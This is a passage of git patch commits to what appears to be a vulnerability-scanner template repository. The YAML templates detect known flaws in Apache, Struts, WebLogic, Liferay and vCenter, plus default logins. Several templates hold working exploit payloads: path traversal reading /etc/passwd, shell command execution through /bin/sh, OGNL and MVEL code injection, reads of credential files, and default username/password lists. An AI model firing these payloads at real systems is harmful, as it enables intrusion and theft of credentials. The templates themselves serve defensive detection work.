a/default-logins/zmanda/zmanda-default-login.yaml b/default-logins/zmanda/zmanda-default-login.yaml index 4bdc37d5c9..adac8a338d 100644 --- a/default-logins/zmanda/zmanda-default-login.yaml +++ b/default-logins/zmanda/zmanda-default-login.yaml @@ -9,14 +9,21 @@ info: tags: zmanda,default-login requests: - - method: POST - path: - - '{{BaseURL}}/ZMC_Admin_Login' - headers: - Content-Type: application/x-www-form-urlencoded - Cookie: zmc_cookies_enabled=true + - raw: + - | + POST /ZMC_Admin_Login HTTP/1.1 + Host:{{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: zmc_cookies_enabled=true - body: login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON + login=AEE&last_page=&username={{username}}&password={{password}}&submit=Login&JS_SWITCH=JS_ON + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: From 8acb8b59f1e2eed8198edd03dbd25f7a2cea0419 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 9 Oct 2021 00:01:53 +0530 Subject: [PATCH 2805/4083] misc update --- default-logins/activemq/activemq-default-login.yaml | 4 ++-- default-logins/nagios/nagios-default-login.yaml | 3 ++- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml index 25fcdc27c9..a4dea884a5 100644 --- a/default-logins/activemq/activemq-default-login.yaml +++ b/default-logins/activemq/activemq-default-login.yaml @@ -12,6 +12,7 @@ requests: GET /admin/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - user @@ -25,5 +26,4 @@ requests: words: - 'Welcome to the Apache ActiveMQ Console of ' - '

    Broker

    ' - condition: and - + condition: and \ No newline at end of file diff --git a/default-logins/nagios/nagios-default-login.yaml b/default-logins/nagios/nagios-default-login.yaml index 23add6498c..6547c8ddc2 100644 --- a/default-logins/nagios/nagios-default-login.yaml +++ b/default-logins/nagios/nagios-default-login.yaml @@ -24,8 +24,9 @@ requests: matchers-condition: and matchers: - type: status - status:å + status: - 200 + - type: word words: - 'Current Status' From 6205415bbd664cdeefdfd96005b8c5da9d037143 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 9 Oct 2021 08:46:17 +0530 Subject: [PATCH 2806/4083] Update keycloak-xss.yaml Updating severity as this XSS is not exploitable directly. --- vulnerabilities/other/keycloak-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/keycloak-xss.yaml b/vulnerabilities/other/keycloak-xss.yaml index ba87129f63..8397f21f07 100644 --- a/vulnerabilities/other/keycloak-xss.yaml +++ b/vulnerabilities/other/keycloak-xss.yaml @@ -3,7 +3,7 @@ id: keycloak-xss info: name: Keycloak <= 8.0 - Cross Site Scripting author: incogbyte - severity: medium + severity: info reference: https://cure53.de/pentest-report_keycloak.pdf tags: keycloak,xss From b8e5b01688d0f6763b57ad7074db23518a58c9d8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 9 Oct 2021 02:11:12 -0300 Subject: [PATCH 2807/4083] Create apache-workflow.yaml --- workflows/apache-workflow.yaml | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 workflows/apache-workflow.yaml diff --git a/workflows/apache-workflow.yaml b/workflows/apache-workflow.yaml new file mode 100644 index 0000000000..ba0e185a61 --- /dev/null +++ b/workflows/apache-workflow.yaml @@ -0,0 +1,11 @@ +id: apache-workflow + +info: + name: Apache workflow + author: philippedelteil + description: A simple workflow that runs all Apache related nuclei templates on a given target. + +workflows: + - template: technologies/apache/apache-detect.yaml + subtemplates: + - tags: apache From 6e122393026d9ccb895883c5b9c79138d2a65e7d Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 9 Oct 2021 02:15:09 -0300 Subject: [PATCH 2808/4083] Update CVE-2017-7615.yaml --- cves/2017/CVE-2017-7615.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml index cadec418f8..33787cf3bd 100644 --- a/cves/2017/CVE-2017-7615.yaml +++ b/cves/2017/CVE-2017-7615.yaml @@ -30,6 +30,7 @@ requests: - "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=" - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -39,4 +40,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From a1fabc1fd86a272107ca2877bd12c993f42c6719 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 9 Oct 2021 02:16:16 -0300 Subject: [PATCH 2809/4083] Update CVE-2014-2383.yaml --- cves/2014/CVE-2014-2383.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml index fd3eca9e6a..2436cab693 100644 --- a/cves/2014/CVE-2014-2383.yaml +++ b/cves/2014/CVE-2014-2383.yaml @@ -18,7 +18,8 @@ requests: - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php" - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php" - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php" - + + stop-at-first-match: true matchers-condition: and matchers: - type: word From e670e2d21ae35020794de9c871805f1af0d1dd0f Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 9 Oct 2021 02:18:50 -0300 Subject: [PATCH 2810/4083] Update apple-app-site-association.yaml --- miscellaneous/apple-app-site-association.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/miscellaneous/apple-app-site-association.yaml b/miscellaneous/apple-app-site-association.yaml index f8e92c7804..dae59faf6a 100644 --- a/miscellaneous/apple-app-site-association.yaml +++ b/miscellaneous/apple-app-site-association.yaml @@ -15,7 +15,8 @@ requests: redirects: true max-redirects: 1 - + + stop-at-first-match: true matchers-condition: and matchers: - type: word From 0c92eb7fa27cd3a66c05b8e79a854500a3cb4460 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 9 Oct 2021 16:37:50 +0530 Subject: [PATCH 2811/4083] Update CVE-2014-2383.yaml --- cves/2014/CVE-2014-2383.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml index 2436cab693..1586860d75 100644 --- a/cves/2014/CVE-2014-2383.yaml +++ b/cves/2014/CVE-2014-2383.yaml @@ -18,7 +18,7 @@ requests: - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php" - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php" - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php" - + stop-at-first-match: true matchers-condition: and matchers: From 8d845f485aaa8f0ae105238147e8580e9a951701 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 9 Oct 2021 16:38:39 +0530 Subject: [PATCH 2812/4083] Update apple-app-site-association.yaml --- miscellaneous/apple-app-site-association.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/miscellaneous/apple-app-site-association.yaml b/miscellaneous/apple-app-site-association.yaml index dae59faf6a..9954c8d681 100644 --- a/miscellaneous/apple-app-site-association.yaml +++ b/miscellaneous/apple-app-site-association.yaml @@ -13,9 +13,6 @@ requests: - "{{BaseURL}}/well-known/apple-app-site-association" - "{{BaseURL}}/apple-app-site-association" - redirects: true - max-redirects: 1 - stop-at-first-match: true matchers-condition: and matchers: From 9b1c57506bafe3b32f607c552c380b52f040e87a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 06:00:43 +0530 Subject: [PATCH 2813/4083] Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check --- cves/2021/CVE-2021-41773.yaml | 31 ++++++++++----- cves/2021/CVE-2021-42013.yaml | 20 +++++++--- vulnerabilities/apache/apache-httpd-rce.yaml | 41 -------------------- 3 files changed, 36 insertions(+), 56 deletions(-) delete mode 100644 vulnerabilities/apache/apache-httpd-rce.yaml diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index ac1d10da37..c1340fcb3d 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -1,29 +1,40 @@ id: CVE-2021-41773 info: - name: Apache 2.4.49 - Path Traversal + name: Apache 2.4.49 - Path Traversal and Remote Code Execution author: daffainfo - severity: high + severity: critical description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. reference: - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 - tags: cve,cve2021,lfi,apache,misconfig + - https://github.com/blasty/CVE-2021-41773 + tags: cve,cve2021,lfi,rce,apache,misconfig requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + - raw: + - | + GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 + Host: {{Hostname}} - matchers-condition: and + - | + POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + echo Content-Type: text/plain; echo; echo CVE-2021-41773 + + matchers-condition: or matchers: - type: regex + name: LFI regex: - "root:.*:0:0" - - type: status - status: - - 200 + - type: word + name: RCE + words: + - "CVE-2021-41773" \ No newline at end of file diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml index f9a621d638..0978186622 100644 --- a/cves/2021/CVE-2021-42013.yaml +++ b/cves/2021/CVE-2021-42013.yaml @@ -2,7 +2,7 @@ id: CVE-2021-42013 info: name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution - author: nvn1729 + author: nvn1729,0xd0ff9 severity: critical description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. reference: @@ -18,14 +18,24 @@ requests: Host: {{Hostname}} Origin: {{BaseURL}} + - |+ + POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + echo Content-Type: text/plain; echo; echo CVE-2021-42013 + unsafe: true - matchers-condition: and + matchers-condition: or matchers: - type: regex + name: LFI regex: - "root:.*:0:0" - - type: status - status: - - 200 + - type: word + name: RCE + words: + - "CVE-2021-42013" \ No newline at end of file diff --git a/vulnerabilities/apache/apache-httpd-rce.yaml b/vulnerabilities/apache/apache-httpd-rce.yaml deleted file mode 100644 index e5f0bcbea2..0000000000 --- a/vulnerabilities/apache/apache-httpd-rce.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: apache-httpd-rce - -info: - name: Apache HTTPd - 2.4.49 (CGI enabled) RCE - author: pdteam - severity: critical - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. - reference: - - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - - https://twitter.com/ptswarm/status/1445376079548624899 - - https://github.com/blasty/CVE-2021-41773 - tags: cve,cve2021,rce,apache - -requests: - - raw: - - | - POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; id - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - condition: and - part: body - words: - - 'uid=' - - 'gid=' - - 'groups=' - - extractors: - - type: regex - regex: - - "(u|g)id=.*" From 5072932509fd82b807c560f952ba776c00fc9263 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 06:43:30 +0530 Subject: [PATCH 2814/4083] more updates --- cves/2013/CVE-2013-2251.yaml | 17 ++++++----------- cves/2017/CVE-2017-17562.yaml | 7 ++++--- cves/2019/CVE-2019-17382.yaml | 4 +++- cves/2020/CVE-2020-14882.yaml | 7 +++---- cves/2020/CVE-2020-7961.yaml | 3 ++- .../grafana/grafana-default-login.yaml | 16 ++++++---------- fuzzing/adminer-panel-fuzz.yaml | 6 +++--- fuzzing/mdb-database-file.yaml | 2 -- fuzzing/prestashop-module-fuzz.yaml | 6 +++--- fuzzing/wordpress-plugins-detect.yaml | 6 ++---- fuzzing/wordpress-themes-detect.yaml | 6 ++---- miscellaneous/ntlm-directories.yaml | 4 +--- .../gitlab/gitlab-user-enumeration.yaml | 3 +-- .../gitlab/gitlab-user-open-api.yaml | 3 +-- vulnerabilities/vmware/vmware-vcenter-lfi.yaml | 5 ++--- 15 files changed, 39 insertions(+), 56 deletions(-) diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index d322c7908c..67158a4a69 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -11,25 +11,19 @@ info: requests: - raw: - | - GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 + GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} - Connection: close Accept: */* - Accept-Language: en - | - GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 + GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} - Connection: close Accept: */* - Accept-Language: en - | - GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 + GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 Host: {{Hostname}} - Connection: close Accept: */* - Accept-Language: en payloads: params: @@ -40,11 +34,12 @@ requests: matchers-condition: and matchers: - type: status + condition: or status: - 200 - 400 - condition: or + - type: regex + part: body regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - part: body diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 0f87ecde9f..7560cc422d 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -91,15 +91,16 @@ requests: - webviewer - welcome - attack: sniper stop-at-first-match: true matchers-condition: and matchers: + - type: status status: - 200 + - type: word + condition: and words: - "environment variable" - - "display library search paths" - condition: and + - "display library search paths" \ No newline at end of file diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index 163e4ead10..24cfb039e5 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -22,14 +22,16 @@ requests: payloads: ids: helpers/wordlists/numbers.txt - attack: sniper + threads: 50 stop-at-first-match: true matchers-condition: and matchers: + - type: status status: - 200 + - type: word words: - "Dashboard" diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 382be20081..e36159a674 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -28,8 +28,7 @@ requests: - | POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 Host: {{Hostname}} - cmd: §exec§ - Connection: close + cmd: {{exec}} Content-Type: application/x-www-form-urlencoded; charset=utf-8 _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29 @@ -41,12 +40,12 @@ requests: matchers-condition: and matchers: + - type: regex + condition: or regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" - condition: or - part: body - type: status status: diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index dd62e8fa68..80017aa104 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -31,11 +31,12 @@ requests: command: - "systeminfo" # Windows - "lsb_release -a" # Linux - attack: sniper matchers-condition: and matchers: + - type: regex + condition: or regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml index efea21f9ff..2ea6e35861 100644 --- a/default-logins/grafana/grafana-default-login.yaml +++ b/default-logins/grafana/grafana-default-login.yaml @@ -1,4 +1,5 @@ id: grafana-default-login + info: name: Grafana Default Login author: pdteam @@ -19,30 +20,25 @@ requests: Referer: {{BaseURL}} content-type: application/json - {"user":"admin","password":"§grafana_password§"} - + {"user":"admin","password":"{{grafana_password}}"} payloads: grafana_password: - prom-operator - admin - attack: sniper - matchers-condition: and matchers: - type: word words: - - grafana_session + - "grafana_session" # Login cookie part: header - # Check for 'grafana_session' cookie on valid login in the response header. - type: word - words: - - Logged in part: body - # Check for valid string on valid login. + words: + - "Logged in" # Logged in keyword - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml index ad8ba27848..0676457b68 100644 --- a/fuzzing/adminer-panel-fuzz.yaml +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -23,17 +23,17 @@ requests: payloads: path: helpers/wordlists/adminer-paths.txt - attack: sniper threads: 50 stop-at-first-match: true matchers-condition: and matchers: - type: word + condition: and words: - "- Adminer" - - "partial(verifyVersion, " - condition: and + - "partial(verifyVersion" + - type: status status: - 200 diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml index 2fe78b348f..4eab49564e 100644 --- a/fuzzing/mdb-database-file.yaml +++ b/fuzzing/mdb-database-file.yaml @@ -14,12 +14,10 @@ requests: Host: {{Hostname}} Origin: {{BaseURL}} Accept-Language: en-US,en;q=0.9 - Connection: close payloads: mdbPaths: helpers/wordlists/mdb-paths.txt - attack: sniper threads: 50 max-size: 500 # Size in bytes - Max Size to read from server response stop-at-first-match: true diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml index 63fd397d99..11072add7c 100644 --- a/fuzzing/prestashop-module-fuzz.yaml +++ b/fuzzing/prestashop-module-fuzz.yaml @@ -1,4 +1,5 @@ id: prestashop-module-fuzz + info: name: Prestashop Modules Enumeration author: meme-lord @@ -16,19 +17,18 @@ requests: payloads: path: helpers/wordlists/prestashop-modules.txt - attack: sniper - threads: 50 + threads: 50 matchers-condition: and matchers: - type: word + condition: and words: - "" - "" - "" - "" - "" - condition: and - type: status status: diff --git a/fuzzing/wordpress-plugins-detect.yaml b/fuzzing/wordpress-plugins-detect.yaml index 1af3f07971..c9f21082e4 100644 --- a/fuzzing/wordpress-plugins-detect.yaml +++ b/fuzzing/wordpress-plugins-detect.yaml @@ -1,4 +1,5 @@ id: wordpress-plugins-detect + info: name: WordPress Plugins Detection author: 0xcrypto @@ -13,11 +14,8 @@ requests: payloads: pluginSlug: helpers/wordlists/wordpress-plugins.txt - attack: sniper - threads: 50 - redirects: true - max-redirects: 1 + threads: 50 matchers-condition: and matchers: - type: status diff --git a/fuzzing/wordpress-themes-detect.yaml b/fuzzing/wordpress-themes-detect.yaml index 9343703599..dd98af2fe3 100644 --- a/fuzzing/wordpress-themes-detect.yaml +++ b/fuzzing/wordpress-themes-detect.yaml @@ -1,4 +1,5 @@ id: wordpress-themes-detect + info: name: WordPress Theme Detection author: 0xcrypto @@ -13,11 +14,8 @@ requests: payloads: themeSlug: helpers/wordlists/wordpress-themes.txt - attack: sniper - threads: 50 - redirects: true - max-redirects: 1 + threads: 50 matchers-condition: and matchers: - type: status diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml index 1733d4647d..a36f3f1287 100644 --- a/miscellaneous/ntlm-directories.yaml +++ b/miscellaneous/ntlm-directories.yaml @@ -14,6 +14,7 @@ requests: Host: {{Hostname}} Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= + threads: 50 payloads: path: - / @@ -63,9 +64,6 @@ requests: - /webticket/webticketservice.svcabs/ - /adfs/services/trust/2005/windowstransport - attack: sniper - threads: 50 - matchers-condition: and matchers: - type: dsl diff --git a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml index 70867414e7..869b0ddd14 100644 --- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml +++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml @@ -16,10 +16,9 @@ requests: Accept: application/json, text/plain, */* Referer: {{BaseURL}} + threads: 50 payloads: user: helpers/wordlists/user-list.txt - attack: sniper - threads: 50 matchers-condition: and matchers: diff --git a/vulnerabilities/gitlab/gitlab-user-open-api.yaml b/vulnerabilities/gitlab/gitlab-user-open-api.yaml index e6b7567303..8302f25e2a 100644 --- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml +++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml @@ -15,10 +15,9 @@ requests: Accept: application/json, text/plain, */* Referer: {{BaseURL}} + threads: 50 payloads: uid: helpers/wordlists/numbers.txt - attack: sniper - threads: 50 matchers-condition: and matchers: diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml index 2fc7c98a9e..9ee7ce40bb 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml @@ -12,7 +12,7 @@ info: requests: - raw: - | - GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1 + GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1 Host: {{Hostname}} payloads: @@ -20,14 +20,13 @@ requests: - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 - attack: sniper matchers-condition: and matchers: - type: regex regex: - "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s=" - part: body + - type: status status: - 200 From 1bd7bef7e5fc3f4eddf38a79efd2d0353962181a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 06:51:50 +0530 Subject: [PATCH 2815/4083] misc updates --- default-logins/UCMDB/ucmdb-default-login.yaml | 2 +- default-logins/abb/cs141-default-login.yaml | 4 +++- default-logins/alibaba/canal-default-login.yaml | 2 +- default-logins/ambari/ambari-default-login.yaml | 2 +- default-logins/arl/arl-default-login.yaml | 2 +- default-logins/axis2/axis2-default-login.yaml | 4 ++-- default-logins/chinaunicom/chinaunicom-default-login.yaml | 2 +- default-logins/dell/dell-idrac-default-login.yaml | 2 +- default-logins/dell/emcecom-default-login.yaml | 2 +- default-logins/druid/druid-default-login.yaml | 4 ++-- default-logins/frps/frp-default-login.yaml | 2 +- default-logins/hortonworks/smartsense-default-login.yaml | 2 +- default-logins/idemia/idemia-biometrics-default-login.yaml | 2 +- default-logins/minio/minio-default-login.yaml | 2 +- default-logins/nagios/nagios-default-login.yaml | 2 +- default-logins/nps/nps-default-login.yaml | 2 +- default-logins/ofbiz/ofbiz-default-login.yaml | 2 +- default-logins/paloalto/panos-default-login.yaml | 2 +- default-logins/rabbitmq/rabbitmq-default-login.yaml | 2 +- default-logins/samsung/samsung-wlan-default-login.yaml | 2 +- default-logins/showdoc/showdoc-default-login.yaml | 2 +- 